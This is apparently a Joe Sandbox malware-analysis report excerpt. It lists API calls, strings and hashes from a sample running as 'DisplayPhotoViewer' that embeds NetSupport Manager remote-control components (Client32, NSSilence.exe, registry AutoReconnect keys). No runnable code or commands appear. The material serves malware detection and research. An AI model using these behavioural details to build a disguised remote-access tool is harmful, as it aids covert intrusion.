                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Close$EnumFolderInformationPathToken_memset$FileHandleModuleNameOpenVersion__strdup_free_strncmp_strncpy
                                                                                                    • String ID: -c"%s"$ -h%s$ -o"%s"$ -r"%s"$ -t"%s"$ActApp Execute String : %s : result %d (0 == SUCCEEDED)$ActApp.exe" $Preparing ActApp Execute String...
                                                                                                    • API String ID: 126255663-1659588059
                                                                                                    • Opcode ID: e8b77d019587922d9771d664db26f8d620b22f4bcc5d4c5b3ef4682664e67d6d
                                                                                                    • Instruction ID: 68228356de1f43e2a3709ec909f76d2e2ed306bf750c234d504acc794db162f3
                                                                                                    • Opcode Fuzzy Hash: e8b77d019587922d9771d664db26f8d620b22f4bcc5d4c5b3ef4682664e67d6d
                                                                                                    • Instruction Fuzzy Hash: 11C16E75D0025ADAEB15DBA4DC90FEEB779AF54208F1081E9D80A67181EB307B49CF71
                                                                                                    Function 1100D1E0 Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf
                                                                                                    • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                                                    • API String ID: 2111968516-2092292787
                                                                                                    • Opcode ID: 4337d410728c3176549b811a5f318792d40639d9d30e7bcad79d1ececddff2fb
                                                                                                    • Instruction ID: 6c1908b0b5acbbd227155ae47bf31b6bbe93f1d1caf817c5e4e7dc0828dd844a
                                                                                                    • Opcode Fuzzy Hash: 4337d410728c3176549b811a5f318792d40639d9d30e7bcad79d1ececddff2fb
                                                                                                    • Instruction Fuzzy Hash: 71F06C3BB8810C57A90186EC744147CF78D67C012D78ED092F58CEBF00E92ADDA0AB99
                                                                                                    Function 1101D0A0 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 217timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EnableWindow.USER32(00000000,?), ref: 1101D0FE
                                                                                                    • InvalidateRect.USER32(00000000,00000000,00000000), ref: 1101D138
                                                                                                    • DeleteObject.GDI32(?), ref: 1101D183
                                                                                                    • SetTimer.USER32(00000000,00000001,000002EE,00000000), ref: 1101D27C
                                                                                                    • SetWindowTextA.USER32(00000000,00000000), ref: 1101D245
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$DeleteEnableErrorExitInvalidateLastMessageObjectProcessRectTextTimerwsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 2329730260-1557312927
                                                                                                    • Opcode ID: f503b32cad4e17b2163d0d32ebd53a037ac5b57c10b4840c3cb5314882a9e559
                                                                                                    • Instruction ID: fa383a0444934d2cc6844facc7ea1457e75435e91d3bcc38e019577a6b5836ac
                                                                                                    • Opcode Fuzzy Hash: f503b32cad4e17b2163d0d32ebd53a037ac5b57c10b4840c3cb5314882a9e559
                                                                                                    • Instruction Fuzzy Hash: 70917D78B00605AFD310DF65DC94F96B3F6BF98318F1086A8EA5A4B295D771F881CB81
                                                                                                    Function 110492F0 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 216registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
                                                                                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000000,00000002,?,00000000,00000000,00000000), ref: 1104948B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Value__wcstoi64
                                                                                                    • String ID: %s|%s|$Client$DisableReconnect$MacAddress$SOFTWARE\Productive Computer Insight\Client32\AutoReconnect
                                                                                                    • API String ID: 2540774538-4016704742
                                                                                                    • Opcode ID: 2e423f4a9e94a2f4796faae418cecff11e5309db5b4d10d90f8677407e7ed056
                                                                                                    • Instruction ID: decd29bba0695e89a2399ee3a937058bad728b4f7561fb74319676153b72d9f3
                                                                                                    • Opcode Fuzzy Hash: 2e423f4a9e94a2f4796faae418cecff11e5309db5b4d10d90f8677407e7ed056
                                                                                                    • Instruction Fuzzy Hash: CF7193B5E10205AFDB54CFA4CCC5FAEF7B9EB49714F24456DE925A7280EA31B900CB60
                                                                                                    Function 11071890 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 153COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InitializeCriticalSection.KERNEL32(111E12A8,218EC38C,1110715D,00000000,00000000,00000000,E8111A9F,11177AA3,000000FF,?,1110681D,0003533B,E0680D75,E8111A9F,00000001,00000000), ref: 110718DE
                                                                                                      • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
                                                                                                    • InitializeCriticalSection.KERNEL32(0000000C,?,1110681D,0003533B,E0680D75,E8111A9F,00000001,00000000,218EC38C,00000000,00000001,00000000,00000000,1117F3B8,000000FF), ref: 11071947
                                                                                                    • InitializeCriticalSection.KERNEL32(00000024,?,1110681D,0003533B,E0680D75,E8111A9F,00000001,00000000,218EC38C,00000000,00000001,00000000,00000000,1117F3B8,000000FF), ref: 1107194D
                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1110681D,0003533B,E0680D75,E8111A9F,00000001,00000000,218EC38C,00000000,00000001,00000000,00000000), ref: 11071957
                                                                                                    • InitializeCriticalSection.KERNEL32(000004C8,?,1110681D,0003533B,E0680D75,E8111A9F,00000001,00000000,218EC38C,00000000,00000001,00000000,00000000), ref: 110719AC
                                                                                                    • InitializeCriticalSection.KERNEL32(000004F0,?,1110681D,0003533B,E0680D75,E8111A9F,00000001,00000000,218EC38C,00000000,00000001,00000000,00000000), ref: 110719B5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalInitializeSection$CreateEvent__wcstoi64
                                                                                                    • String ID: *MaxRxPending$*TraceRecv$*TraceSend$General$_debug
                                                                                                    • API String ID: 4263422321-2298398812
                                                                                                    • Opcode ID: fab30e78341cd134c0767804648c31141ef37f3aa6108be01e73b9727e08f68a
                                                                                                    • Instruction ID: 0089207d2e7d9da25254d1d5d3c0e63d3f288bed5d4fbdc6d3593f91d587987d
                                                                                                    • Opcode Fuzzy Hash: fab30e78341cd134c0767804648c31141ef37f3aa6108be01e73b9727e08f68a
                                                                                                    • Instruction Fuzzy Hash: C751DFB1A00645AFDB11CF65CC80B9ABBE9FF84308F0485AAED599F285D771A500CFA0
                                                                                                    Function 1103B620 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 146COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • SETOPTICALDRIVEACCESS, xrefs: 1103B6B4
                                                                                                    • SETUSBMASSSTORAGEACCESS, xrefs: 1103B683
                                                                                                    • IsA(), xrefs: 1103B724
                                                                                                    • RESUMEPRINTINGPRINTER=*FILETYPES=, xrefs: 1103B702
                                                                                                    • SETOPTICALDRIVEACCESSACCESSMODES=%u, xrefs: 1103B6CF
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 1103B71F
                                                                                                    • BLOCKPRINTING, xrefs: 1103B6DD
                                                                                                    • SETUSBMASSSTORAGEACCESSACCESSMODES=%u, xrefs: 1103B6A6
                                                                                                    • BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1, xrefs: 1103B6FB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _malloc_memmove
                                                                                                    • String ID: BLOCKPRINTING$BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1$IsA()$RESUMEPRINTINGPRINTER=*FILETYPES=$SETOPTICALDRIVEACCESS$SETOPTICALDRIVEACCESSACCESSMODES=%u$SETUSBMASSSTORAGEACCESS$SETUSBMASSSTORAGEACCESSACCESSMODES=%u$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
                                                                                                    • API String ID: 1183979061-2531374130
                                                                                                    • Opcode ID: 5515f167e16460a9d37948cfc1bd44b09a726d09ba6ddbb2e2d743d504f0eea1
                                                                                                    • Instruction ID: 8a413795910aa854a61ecf1c8b2646081c70e315011e045b2f35bf9a9a7248ad
                                                                                                    • Opcode Fuzzy Hash: 5515f167e16460a9d37948cfc1bd44b09a726d09ba6ddbb2e2d743d504f0eea1
                                                                                                    • Instruction Fuzzy Hash: 3F41A179A0060A9FCB01DF64DC94FEAB7B9FF85219F044269E855A7241EA34F508CBA0
                                                                                                    Function 110E99E0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 99libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(PCIImage.dll,?,?,?,?,?,110023F1,?,00000000,?,?,?,218EC38C), ref: 110E99F0
                                                                                                    • GetProcAddress.KERNEL32(00000000,CompressBitmapToJPEG), ref: 110E9A08
                                                                                                    • GetProcAddress.KERNEL32(00000000,CompressBitmapToPNG), ref: 110E9A12
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 110E9A41
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryProc$FreeLoad
                                                                                                    • String ID: CompressBitmapToJPEG$CompressBitmapToPNG$PCIImage.dll
                                                                                                    • API String ID: 2256533930-3959649894
                                                                                                    • Opcode ID: ca754930bd598a6d98cf17161ae83e55d4b71fd3ce574fb9b46ab4de80b8a2d8
                                                                                                    • Instruction ID: e6900cb5de1ae588f16feade9a47c287aed82bf06d5dcbc10e309876cba9ba0c
                                                                                                    • Opcode Fuzzy Hash: ca754930bd598a6d98cf17161ae83e55d4b71fd3ce574fb9b46ab4de80b8a2d8
                                                                                                    • Instruction Fuzzy Hash: 9F2129B6B01118ABDB10DF9EECC59DEF7A8EB84225B148166FD1DD3304E6359D108BE1
                                                                                                    Function 1111B740 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 96windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
                                                                                                    • GetVersionExA.KERNEL32(?,View,*NoHideFEP,00000000,00000000), ref: 1111B79F
                                                                                                    • InterlockedExchange.KERNEL32(111E4544,00000001), ref: 1111B7C5
                                                                                                    • CreateWindowExA.USER32(00000000,button,11189200,50000000,FFFFEC78,00000000,00000014,0000000E,?,00000001,00000000,00000000), ref: 1111B80B
                                                                                                    • SetWindowLongA.USER32(00000000,000000FC,1111B6C0), ref: 1111B82B
                                                                                                    • SetFocus.USER32(00000000), ref: 1111B842
                                                                                                    • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 1111B85C
                                                                                                    • DestroyWindow.USER32(00000000), ref: 1111B872
                                                                                                    • InterlockedExchange.KERNEL32(111E4544,00000000), ref: 1111B889
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$ExchangeInterlockedLong$CreateDestroyFocusVersion__wcstoi64
                                                                                                    • String ID: *NoHideFEP$View$button
                                                                                                    • API String ID: 1610953178-1502386645
                                                                                                    • Opcode ID: 6be10358722cd5fa09e0826523a1bff8bf97701c83194793b8d628c17dce3d52
                                                                                                    • Instruction ID: d8ba65d08aa0072bd3d58eefe54997aee3b5c7d595cd4abcbc84e9516d592a6f
                                                                                                    • Opcode Fuzzy Hash: 6be10358722cd5fa09e0826523a1bff8bf97701c83194793b8d628c17dce3d52
                                                                                                    • Instruction Fuzzy Hash: C831A770641321AFE7119FB5DD89B6AFBB8FB04B08F104539EC25DBA88E7709500CB14
                                                                                                    Function 1100D530 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 80processCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 110E6E10: LocalAlloc.KERNEL32(00000040,00000014,?,1100D54F,?), ref: 110E6E20
                                                                                                      • Part of subcall function 110E6E10: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D54F,?), ref: 110E6E32
                                                                                                      • Part of subcall function 110E6E10: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D54F,?), ref: 110E6E44
                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D567
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D580
                                                                                                    • _strrchr.LIBCMT ref: 1100D58F
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 1100D59F
                                                                                                    • wsprintfA.USER32 ref: 1100D5C0
                                                                                                    • _memset.LIBCMT ref: 1100D5D1
                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D609
                                                                                                    • CloseHandle.KERNEL32(?,00000000), ref: 1100D621
                                                                                                    • CloseHandle.KERNEL32(?), ref: 1100D62A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleName_memset_strrchrwsprintf
                                                                                                    • String ID: %sNSSilence.exe %u %u$D
                                                                                                    • API String ID: 1760462761-4146734959
                                                                                                    • Opcode ID: 5c47d791ebb0455a0414624acc2f231ef79ea9f418f3e9565118a7b676644310
                                                                                                    • Instruction ID: 458e4223dd7e5fdac6edea5c1260bbf495d89690d61fca6328f8b539b3dde787
                                                                                                    • Opcode Fuzzy Hash: 5c47d791ebb0455a0414624acc2f231ef79ea9f418f3e9565118a7b676644310
                                                                                                    • Instruction Fuzzy Hash: 5421BA75E51318ABEB50DB90DC49FDDB77C9B08708F108095F619971C4DAB0AA44CF64
                                                                                                    Function 10702330 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 79libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,?,00000000), ref: 10702356
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1070235D
                                                                                                    • GetCurrentProcessId.KERNEL32(00000000), ref: 10702373
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 10702391
                                                                                                    • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 1070239B
                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 107023AE
                                                                                                    • GetTokenInformation.ADVAPI32(00000000,0000000C(TokenIntegrityLevel),10712188,00000004,?), ref: 107023CD
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 107023F4
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 107023FB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$Handle$CloseCurrentOpenToken$AddressInformationModuleProc
                                                                                                    • String ID: ProcessIdToSessionId$kernel32.dll
                                                                                                    • API String ID: 2536908267-3889420803
